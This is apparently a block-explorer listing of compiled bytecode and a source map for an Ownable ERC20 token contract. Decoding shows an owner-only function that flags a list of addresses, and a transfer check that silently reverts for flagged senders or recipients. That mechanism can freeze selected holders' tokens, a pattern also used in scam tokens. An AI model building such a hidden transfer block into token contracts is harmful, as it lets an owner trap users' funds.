ffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610c295760011515600760009054906101000a900460ff16151514610c28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1f906117ab565b60405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c909061183d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d00906118cf565b60405180910390fd5b610d14838383610fe6565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9290611961565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e8b91906111ce565b60405180910390a3610e9e848484610feb565b50505050565b610eac6108cd565b73ffffffffffffffffffffffffffffffffffffffff16610eca61060a565b73ffffffffffffffffffffffffffffffffffffffff1614610f20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f17906119cd565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561102a57808201518184015260208101905061100f565b83811115611039576000848401525b50505050565b6000601f19601f8301169050919050565b600061105b82610ff0565b6110658185610ffb565b935061107581856020860161100c565b61107e8161103f565b840191505092915050565b600060208201905081810360008301526110a38184611050565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110e0826110b5565b9050919050565b6110f0816110d5565b81146110fb57600080fd5b50565b60008135905061110d816110e7565b92915050565b6000819050919050565b61112681611113565b811461113157600080fd5b50565b6000813590506111438161111d565b92915050565b600080604083850312156111605761115f6110ab565b5b600061116e858286016110fe565b925050602061117f85828601611134565b9150509250929050565b60008115159050919050565b61119e81611189565b82525050565b60006020820190506111b96000830184611195565b92915050565b6111c881611113565b82525050565b60006020820190506111e360008301846111bf565b92915050565b600080600060608486031215611202576112016110ab565b5b6000611210868287016110fe565b9350506020611221868287016110fe565b925050604061123286828701611134565b9150509250925092565b600060ff82169050919050565b6112528161123c565b82525050565b600060208201905061126d6000830184611249565b92915050565b600060208284031215611289576112886110ab565b5b6000611297848285016110fe565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112c5576112c46112a0565b5b8235905067ffffffffffffffff8111156112e2576112e16112a5565b5b6020830191508360208202830111156112fe576112fd6112aa565b5b9250929050565b6000806020838503121561131c5761131b6110ab565b5b600083013567ffffffffffffffff81111561133a576113396110b0565b5b611346858286016112af565b92509250509250929050565b61135b816110d5565b82525050565b60006020820190506113766000830184611352565b92915050565b60008060408385031215611393576113926110ab565b5b60006113a1858286016110fe565b92505060206113b2858286016110fe565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061140357607f821691505b60208210811415611417576114166113bc565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061145782611113565b915061146283611113565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114975761149661141d565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061152d602583610ffb565b9150611538826114d1565b604082019050919050565b6000602082019050818103600083015261155c81611520565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115bf602683610ffb565b91506115ca82611563565b604082019050919050565b600060208201905081810360008301526115ee816115b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611651602483610ffb565b915061165c826115f5565b604082019050919050565b6000602082019050818103600083015261168081611644565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116e3602283610ffb565b91506116ee82611687565b604082019050919050565b60006020820190508181036000830152611712816116d6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061174f601d83610ffb565b915061175a82611719565b602082019050919050565b6000602082019050818103600083015261177e81611742565b9050919050565b50565b6000611795600083610ffb565b91506117a082611785565b600082019050919050565b600060208201905081810360008301526117c481611788565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611827602583610ffb565b9150611832826117cb565b604082019050919050565b600060208201905081810360008301526118568161181a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118b9602383610ffb565b91506118c48261185d565b604082019050919050565b600060208201905081810360008301526118e8816118ac565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061194b602683610ffb565b9150611956826118ef565b604082019050919050565b6000602082019050818103600083015261197a8161193e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119b7602083610ffb565b91506119c282611981565b602082019050919050565b600060208201905081810360008301526119e6816119aa565b905091905056fea2646970667358221220eb331d0e675854619f3c23e0be066827f5464aa8827b9f109ccb00ff67c278a964736f6c634300080c0033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063f3294c13146103685761010b565b8063715018a61461025a5780637a49cddb146102645780638da5cb5b1461028057806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806332a0e002146101ca57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611089565b60405180910390f35b61014860048036038101906101439190611149565b610416565b60405161015591906111a4565b60405180910390f35b610166610439565b60405161017391906111ce565b60405180910390f35b610196600480360381019061019191906111e9565b610443565b6040516101a391906111a4565b60405180910390f35b6101b4610472565b6040516101c19190611258565b60405180910390f35b6101e460048036038101906101df9190611273565b61047b565b6040516101f191906111a4565b60405180910390f35b610214600480360381019061020f9190611149565b6104d1565b60405161022191906111a4565b60405180910390f35b610244600480360381019061023f9190611273565b610508565b60405161025191906111ce565b60405180910390f35b610262610551565b005b61027e60048036038101906102799190611305565b610565565b005b61028861060a565b6040516102959190611361565b60405180910390f35b6102a6610633565b6040516102b39190611089565b60405180910390f35b6102d660048036038101906102d19190611149565b6106c5565b6040516102e391906111a4565b60405180910390f35b61030660048036038101906103019190611149565b61073c565b60405161031391906111a4565b60405180910390f35b6103366004803603810190610331919061137c565b61075f565b60405161034391906111ce565b60405180910390f35b61036660048036038101906103619190611273565b6107e6565b005b610382600480360381019061037d9190611273565b61086a565b005b606060058054610393906113eb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906113eb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216108cd565b905061042e8185856108d5565b600191505092915050565b6000600454905090565b60008061044e6108cd565b905061045b858285610aa0565b610466858585610b2c565b60019150509392505050565b60006012905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000806104dc6108cd565b90506104fd8185856104ee858961075f565b6104f8919061144c565b6108d5565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610ea4565b6105636000610f22565b565b61056d610ea4565b60005b8282905081101561060557600160026000858585818110610594576105936114a2565b5b90506020020160208101906105a99190611273565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550806001019050610570565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610642906113eb565b80601f016020809104026020016040519081016040528092919081815260200182805461066e906113eb565b80156106bb5780601f10610690576101008083540402835291602001916106bb565b820191906000526020600020905b81548152906001019060200180831161069e57829003601f168201915b5050505050905090565b6000806106d06108cd565b905060006106de828661075f565b905083811015610723576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071a90611543565b60405180910390fd5b61073082868684036108d5565b60019250505092915050565b6000806107476108cd565b9050610754818585610b2c565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107ee610ea4565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561085e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610855906115d5565b60405180910390fd5b61086781610f22565b50565b610872610ea4565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610945576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093c90611667565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ac906116f9565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9391906111ce565b60405180910390a3505050565b6000610aac848461075f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b265781811015610b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0f90611765565b60405180910390fd5b610b2584848484036108d5565b5b50505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610bcd5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610c295760011515600760009054906101000a900460ff16151514610c28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1f906117ab565b60405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c909061183d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d00906118cf565b60405180910390fd5b610d14838383610fe6565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9290611961565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e8b91906111ce565b60405180910390a3610e9e848484610feb565b50505050565b610eac6108cd565b73ffffffffffffffffffffffffffffffffffffffff16610eca61060a565b73ffffffffffffffffffffffffffffffffffffffff1614610f20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f17906119cd565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561102a57808201518184015260208101905061100f565b83811115611039576000848401525b50505050565b6000601f19601f8301169050919050565b600061105b82610ff0565b6110658185610ffb565b935061107581856020860161100c565b61107e8161103f565b840191505092915050565b600060208201905081810360008301526110a38184611050565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110e0826110b5565b9050919050565b6110f0816110d5565b81146110fb57600080fd5b50565b60008135905061110d816110e7565b92915050565b6000819050919050565b61112681611113565b811461113157600080fd5b50565b6000813590506111438161111d565b92915050565b600080604083850312156111605761115f6110ab565b5b600061116e858286016110fe565b925050602061117f85828601611134565b9150509250929050565b60008115159050919050565b61119e81611189565b82525050565b60006020820190506111b96000830184611195565b92915050565b6111c881611113565b82525050565b60006020820190506111e360008301846111bf565b92915050565b600080600060608486031215611202576112016110ab565b5b6000611210868287016110fe565b9350506020611221868287016110fe565b925050604061123286828701611134565b9150509250925092565b600060ff82169050919050565b6112528161123c565b82525050565b600060208201905061126d6000830184611249565b92915050565b600060208284031215611289576112886110ab565b5b6000611297848285016110fe565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112c5576112c46112a0565b5b8235905067ffffffffffffffff8111156112e2576112e16112a5565b5b6020830191508360208202830111156112fe576112fd6112aa565b5b9250929050565b6000806020838503121561131c5761131b6110ab565b5b600083013567ffffffffffffffff81111561133a576113396110b0565b5b611346858286016112af565b92509250509250929050565b61135b816110d5565b82525050565b60006020820190506113766000830184611352565b92915050565b60008060408385031215611393576113926110ab565b5b60006113a1858286016110fe565b92505060206113b2858286016110fe565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061140357607f821691505b60208210811415611417576114166113bc565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061145782611113565b915061146283611113565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114975761149661141d565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061152d602583610ffb565b9150611538826114d1565b604082019050919050565b6000602082019050818103600083015261155c81611520565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115bf602683610ffb565b91506115ca82611563565b604082019050919050565b600060208201905081810360008301526115ee816115b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611651602483610ffb565b915061165c826115f5565b604082019050919050565b6000602082019050818103600083015261168081611644565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116e3602283610ffb565b91506116ee82611687565b604082019050919050565b60006020820190508181036000830152611712816116d6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061174f601d83610ffb565b915061175a82611719565b602082019050919050565b6000602082019050818103600083015261177e81611742565b9050919050565b50565b6000611795600083610ffb565b91506117a082611785565b600082019050919050565b600060208201905081810360008301526117c481611788565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611827602583610ffb565b9150611832826117cb565b604082019050919050565b600060208201905081810360008301526118568161181a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118b9602383610ffb565b91506118c48261185d565b604082019050919050565b600060208201905081810360008301526118e8816118ac565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061194b602683610ffb565b9150611956826118ef565b604082019050919050565b6000602082019050818103600083015261197a8161193e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119b7602083610ffb565b91506119c282611981565b602082019050919050565b600060208201905081810360008301526119e6816119aa565b905091905056fea2646970667358221220eb331d0e675854619f3c23e0be066827f5464aa8827b9f109ccb00ff67c278a964736f6c634300080c0033

Deployed Bytecode Sourcemap

81:141:2:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2224:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4935:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3746:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5694:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3161:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3582:104;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6375:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3910:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2510:101:0;;;:::i;:::-;;3258:217:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1887:85:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2435:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7096:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4231:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4478:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2760:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3481:95:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2224:98;2278:13;2310:5;2303:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2224:98;:::o;4935:197::-;5018:4;5034:13;5050:12;:10;:12::i;:::-;5034:28;;5072:32;5081:5;5088:7;5097:6;5072:8;:32::i;:::-;5121:4;5114:11;;;4935:197;;;;:::o;3746:106::-;3807:7;3833:12;;3826:19;;3746:106;:::o;5694:286::-;5821:4;5837:15;5855:12;:10;:12::i;:::-;5837:30;;5877:38;5893:4;5899:7;5908:6;5877:15;:38::i;:::-;5925:27;5935:4;5941:2;5945:6;5925:9;:27::i;:::-;5969:4;5962:11;;;5694:286;;;;;:::o;3161:91::-;3219:5;3243:2;3236:9;;3161:91;:::o;3582:104::-;3639:4;3662:8;:17;3671:7;3662:17;;;;;;;;;;;;;;;;;;;;;;;;;3655:24;;3582:104;;;:::o;6375:234::-;6463:4;6479:13;6495:12;:10;:12::i;:::-;6479:28;;6517:64;6526:5;6533:7;6570:10;6542:25;6552:5;6559:7;6542:9;:25::i;:::-;:38;;;;:::i;:::-;6517:8;:64::i;:::-;6598:4;6591:11;;;6375:234;;;;:::o;3910:125::-;3984:7;4010:9;:18;4020:7;4010:18;;;;;;;;;;;;;;;;4003:25;;3910:125;;;:::o;2510:101:0:-;1780:13;:11;:13::i;:::-;2574:30:::1;2601:1;2574:18;:30::i;:::-;2510:101::o:0;3258:217:1:-;1780:13:0;:11;:13::i;:::-;3340:9:1::1;3335:125;3359:7;;:14;;3355:1;:18;3335:125;;;3414:4;3391:8;:20;3400:7;;3408:1;3400:10;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3391:20;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;3444:3;;;;;3335:125;;;;3258:217:::0;;:::o;1887:85:0:-;1933:7;1959:6;;;;;;;;;;;1952:13;;1887:85;:::o;2435:102:1:-;2491:13;2523:7;2516:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2435:102;:::o;7096:427::-;7189:4;7205:13;7221:12;:10;:12::i;:::-;7205:28;;7243:24;7270:25;7280:5;7287:7;7270:9;:25::i;:::-;7243:52;;7333:15;7313:16;:35;;7305:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;7424:60;7433:5;7440:7;7468:15;7449:16;:34;7424:8;:60::i;:::-;7512:4;7505:11;;;;7096:427;;;;:::o;4231:189::-;4310:4;4326:13;4342:12;:10;:12::i;:::-;4326:28;;4364;4374:5;4381:2;4385:6;4364:9;:28::i;:::-;4409:4;4402:11;;;4231:189;;;;:::o;4478:149::-;4567:7;4593:11;:18;4605:5;4593:18;;;;;;;;;;;;;;;:27;4612:7;4593:27;;;;;;;;;;;;;;;;4586:34;;4478:149;;;;:::o;2760:198:0:-;1780:13;:11;:13::i;:::-;2868:1:::1;2848:22;;:8;:22;;;;2840:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2923:28;2942:8;2923:18;:28::i;:::-;2760:198:::0;:::o;3481:95:1:-;1780:13:0;:11;:13::i;:::-;3564:5:1::1;3544:8;:17;3553:7;3544:17;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;3481:95:::0;:::o;640:96:0:-;693:7;719:10;712:17;;640:96;:::o;11090:370:1:-;11238:1;11221:19;;:5;:19;;;;11213:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11318:1;11299:21;;:7;:21;;;;11291:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11400:6;11370:11;:18;11382:5;11370:18;;;;;;;;;;;;;;;:27;11389:7;11370:27;;;;;;;;;;;;;;;:36;;;;11437:7;11421:32;;11430:5;11421:32;;;11446:6;11421:32;;;;;;:::i;:::-;;;;;;;;11090:370;;;:::o;11741:441::-;11871:24;11898:25;11908:5;11915:7;11898:9;:25::i;:::-;11871:52;;11957:17;11937:16;:37;11933:243;;12018:6;11998:16;:26;;11990:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12100:51;12109:5;12116:7;12144:6;12125:16;:25;12100:8;:51::i;:::-;11933:243;11861:321;11741:441;;;:::o;7977:900::-;8099:8;:12;8108:2;8099:12;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;8115:8;:14;8124:4;8115:14;;;;;;;;;;;;;;;;;;;;;;;;;8099:30;8095:72;;;8158:4;8139:23;;:15;;;;;;;;;;;:23;;;8131:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;8095:72;8201:1;8185:18;;:4;:18;;;;8177:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8277:1;8263:16;;:2;:16;;;;8255:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;8330:38;8351:4;8357:2;8361:6;8330:20;:38::i;:::-;8379:19;8401:9;:15;8411:4;8401:15;;;;;;;;;;;;;;;;8379:37;;8449:6;8434:11;:21;;8426:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;8564:6;8550:11;:20;8532:9;:15;8542:4;8532:15;;;;;;;;;;;;;;;:38;;;;8764:6;8747:9;:13;8757:2;8747:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;8811:2;8796:26;;8805:4;8796:26;;;8815:6;8796:26;;;;;;:::i;:::-;;;;;;;;8833:37;8853:4;8859:2;8863:6;8833:19;:37::i;:::-;8085:792;7977:900;;;:::o;2045:130:0:-;2119:12;:10;:12::i;:::-;2108:23;;:7;:5;:7::i;:::-;:23;;;2100:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2045:130::o;3112:187::-;3185:16;3204:6;;;;;;;;;;;3185:25;;3229:8;3220:6;;:17;;;;;;;;;;;;;;;;;;3283:8;3252:40;;3273:8;3252:40;;;;;;;;;;;;3175:124;3112:187;:::o;12766:121:1:-;;;;:::o;13475:120::-;;;;:::o;7:99:5:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:619::-;3923:6;3931;3939;3988:2;3976:9;3967:7;3963:23;3959:32;3956:119;;;3994:79;;:::i;:::-;3956:119;4114:1;4139:53;4184:7;4175:6;4164:9;4160:22;4139:53;:::i;:::-;4129:63;;4085:117;4241:2;4267:53;4312:7;4303:6;4292:9;4288:22;4267:53;:::i;:::-;4257:63;;4212:118;4369:2;4395:53;4440:7;4431:6;4420:9;4416:22;4395:53;:::i;:::-;4385:63;;4340:118;3846:619;;;;;:::o;4471:86::-;4506:7;4546:4;4539:5;4535:16;4524:27;;4471:86;;;:::o;4563:112::-;4646:22;4662:5;4646:22;:::i;:::-;4641:3;4634:35;4563:112;;:::o;4681:214::-;4770:4;4808:2;4797:9;4793:18;4785:26;;4821:67;4885:1;4874:9;4870:17;4861:6;4821:67;:::i;:::-;4681:214;;;;:::o;4901:329::-;4960:6;5009:2;4997:9;4988:7;4984:23;4980:32;4977:119;;